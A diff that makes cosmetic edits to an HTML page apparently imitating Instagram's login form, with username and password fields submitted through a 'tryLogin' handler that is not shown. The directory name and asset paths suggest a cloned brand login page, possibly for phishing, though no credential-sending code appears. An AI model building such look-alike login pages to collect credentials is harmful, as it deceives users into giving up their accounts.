--- a/HTMLInstagram/index.html
+++ b/HTMLInstagram/index.html
@@ -16,7 +16,7 @@
 <body>
 
 <div id="main">
-  <img src="/android/gallery_instagram-logo.png" alt="Instagram Logo" height="200px" width="auto">
+  <img src="/android/gallery_instagram-logo.png" alt="Instagram Logo" id="logo">
   <form class="login-form" method="post"  onsubmit="tryLogin(this); event.preventDefault();">
     <h3 class="form-title">Login to your account</h3>
     <div class="alert alert-danger display-hide">
@@ -26,14 +26,14 @@
     </div>
     <div class="form-group">
       <!--ie8, ie9 does not support html5 placeholder, so we just show field title for that-->
-      <label class="control-label visible-ie8 visible-ie9">Username</label>
+      <!-- <label class="control-label visible-ie8 visible-ie9">Username</label> -->
       <div class="input-icon">
         <i class="fa fa-user"></i>
         <input class="form-control placeholder-no-fix" type="text" autocomplete="off" placeholder="Username" name="username" id="username"/>
       </div>
     </div>
     <div class="form-group">
-      <label class="control-label visible-ie8 visible-ie9">Password</label>
+      <!-- <label class="control-label visible-ie8 visible-ie9">Password</label> -->
       <div class="input-icon">
         <i class="fa fa-lock"></i>
         <input class="form-control placeholder-no-fix" type="password" autocomplete="off" placeholder="Password" name="password" id="password"/>
